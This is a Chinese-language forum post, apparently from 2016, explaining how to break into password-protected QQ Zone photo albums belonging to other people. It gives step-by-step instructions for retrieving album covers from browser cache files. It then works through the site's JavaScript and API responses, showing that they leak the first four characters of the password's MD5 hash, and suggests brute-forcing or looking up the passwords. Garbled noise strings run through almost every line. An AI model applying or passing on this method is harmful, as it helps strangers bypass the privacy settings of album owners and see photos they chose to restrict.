|
|
现在很多人都拥有QQ空间,并且上传了自己的照片。当你想看看新朋友的庐山真面目,可惜给相册加了密码。是不是很扫兴,现在就教你破解掉这个密码来观看加密相册。
" Z. |1 }5 J9 [# @! U7 Z7 h! S
- B1 \4 W( `8 y4 s* K& D3 E' E1 R4 [首先打开一个已经加过密的QQ空间相册页面,然后打开IE“工具-internet-选项”,在“常规”中的“internet临时文件夹”下,依次选择删除“cookies”和“删除文件”删除临时文件夹中所有的cookies和文件,然后再点击“设置”,在“设置窗口”选择“查看文件”,这样就打开了IE临时文件夹。
1 k/ f$ o: R7 d( x- D' R5 F6 s9 i" g' h6 _6 G
然后打开需要破解的加密相册,出现一个对话框需要输入密码,这是选择取消,在刷新一下空间,点击“相册”。作完上面的动作后找到临时文件夹,刷新一下,里面会有一个“cgi_qqzone_static”的XML文档。双击打开它,在弹出的对话框中选择“是”,打开的是一个代码文件。按Ctrl+f查找,输入“我”进行查找,找到<![CDATA[ 我 ]]>这段代码,下面那个地址就是QQ相册的封面地址。复制他就能看到加密图片的封面
& R+ ]4 h# Z$ |- a8 i根据http://izone.qq.com/client/photo ... &album=31931732 4 s, K8 a! Z6 R, U ~, o
下载或者翻看Internet临时文件夹下的 photo_password 文件可查到下列语句:
& s9 f9 @8 H/ ^- b3 p' g; s. _# Wtype="text/JavaScript" src=https://www.abc369.net/info/way/"/js/md5.js"></script>
- |2 ]0 X2 P; l) S9 Tdocument.cookie=("album"+albumId+"pwd="+hex_md5(pwd));
) O b \% d! N9 H0 `' Z% t对比 md5.js文件可知,此v2.1版本的 JavaScript MD5,且输入的密码转化为32位的字符串。
" O3 [$ F2 Z# o2 O& j0 S0 c2 }6 U* c; z
比较两个地址: $ y: O; I. F' t& q, P, X# \
http://photo.qq.com/cgi-bin/izon ... mp;albumid=31931732
9 s# J5 X* r5 Q3 V v: |+ U& D; K# k/*http://izone.qq.com/client/photo ... amp;album=31931732/这个地址类似可以不看*/ " P" P0 X& F8 \
(此地址为有密码情况下的登陆地址,要求输入密码) 8 h4 I$ n6 |* q0 E9 ^
http://photo.qq.com/cgi-bin/izon ... asswd=&mode=big
) Y3 |6 Z* ]% u/ ~$ O(此地址为无密码情况下的登陆地址)
! n) F# j R4 i2 T7 F9 Y5 _
3 R3 p1 S4 f3 A由此可以推断出:
/ l( _3 w( v* _; T$ y' X. Y7 a# Zhttp://photo.qq.com/cgi-bin/izon ... 1931732&passwd=(广告广告广告广告广告*)&mode=big
1 e1 h: E4 W4 u& R' q广告广告为转化后的md5字符串,此地址应该为此地址为有密码情况下的直接登陆地址。
/ c0 t+ ~3 m( d& P随便输入一段字符显示如下: _# a+ H0 X, Q
<?xml version="1.0" encoding="GBK" ?>
6 ]* a- ~3 \+ j3 p<error>密码有误,请重新输入!</error> : e2 s0 ~9 c0 v1 n+ J( E
考虑到在前面有密码情况下的登陆窗口连接为cgi_album_pwd,浏览相册连接为cgi_album_view。
. i7 S4 a+ L( ? m5 Z试将登陆地址改为下列方式:
) e3 |) |5 P" X/ h8 ^% Lhttp://photo.qq.com/cgi-bin/izon ... 1931732&passwd=(广告广告广告广告广告*)&mode=big ; k- j% l: b! F7 k5 R; e
随便输入一段字符显示如下:
' i9 q& W: t9 `; Y% @9 r4 }# |<?xml version="1.0" encoding="GBK" ?> : G9 a: j4 j/ I9 h' v8 F! Q# d& i
<data id="31931732" owner="23266229" passwd="81dc" />
" r0 w) s" B$ u# b1 J- {9 S经过换算可知,1234的MD5值是81dc9bdb52d04dc20036dbd8313ed055
% g# L8 s+ ^) t s ?1 Z( G& a0 O0 r测试数次 9 x; `0 Z2 Y3 B9 `0 ?
<?xml version="1.0" encoding="GBK" ?>
" O$ R) ]! ]2 p( T6 n<data id="31931732" owner="23266229" passwd="1bbd" /> ) B- h) p9 L+ }8 L: o; A% y
密码:11111111 MD5:1bbd886460827015e5d605ed44252251 $ J" h5 F9 r8 _( ]/ d' k* q8 V
<?xml version="1.0" encoding="GBK" ?> 0 F# `# ~1 f, r" c5 r. j$ Y
<data id="31931732" owner="23266229" passwd="eccb" /> ' j. z9 \! O+ M" ?3 G. z# e
密码:3 MD5:eccbc87e4b5ce2fe28308fd9f2a7baf3
' s3 M% ?- t5 J0 f9 [由此可以判断,此处的passwd为密码加密后的前4位。 2 |- x! J) @- A1 K
photo_password 文件可查到下列语句: ) c. E' r- Y: J' E7 b% v9 R8 Y$ v+ E) K
var p="";
( g2 j9 k7 |2 h. g5 |if (x!=null) p=x.selectSingleNode("/data").getAttribute("passwd");
) B3 \7 m z) z. q判断此passwd应该是数据库中的某字段名。
3 N( I) d( F- e) zif (p!="" && hex_md5(pwd).indexOf(p)!=0){ # ?! e( B! g" z7 M0 q. l( O
alert("密码错误") + Y4 \" B" [2 \0 C& Q
document.getElementById("pass").focus();
1 e1 b9 \5 w0 q0 h. f( M2 Kreturn;
& z7 s, {2 l8 I/ [/ k6 s} ; @% D" T8 I" I# w, |; i
document.cookie=("album"+albumId+"pwd="+hex_md5(pwd)); 5 `& Q/ A! K- A8 G7 X9 Z" A( @
location="/client/photo_static_big.htm?uin="+uin+"&album="+albumId; ' t& O3 G- ~% Q: g0 ~
pwd为输入的密码,经过md5加密。判断此处出现的passwd="eccb"应该是验证输入的密文密码的正确性的。如果正确,使用hex_md5(pwd)进行登陆。
( M3 @. w' w* `
# Z' s# E. d9 i, [由于qq相册密码提示为8位,那么如果有心人使用相关工具换算处8位以下的所有数字和字母组合的MD5值做成数据库,那么密码就如同虚设。但是考虑到相册密码意义不大,一般情况下不会有人过于无聊拿机器去跑这东西... 似乎最基本常见的的运算次数为几百万亿次,如果谁又兴趣搞几台服务器跑天把做个数据库倒是蛮好,就是大了点准备个TB级的硬盘矩阵吧。如果怕麻烦可以去国外的几个大型MD5数据库查询
4 z0 N g/ [# R2 X* F. ] |
|
|手机版|小黑屋|☆我要吧☆
( 豫ICP备13016831号-1 )
狗仔卡
发表于 2016-4-6 22:05:08
提升卡
置顶卡
锁贴卡
解贴卡
变色卡
显身卡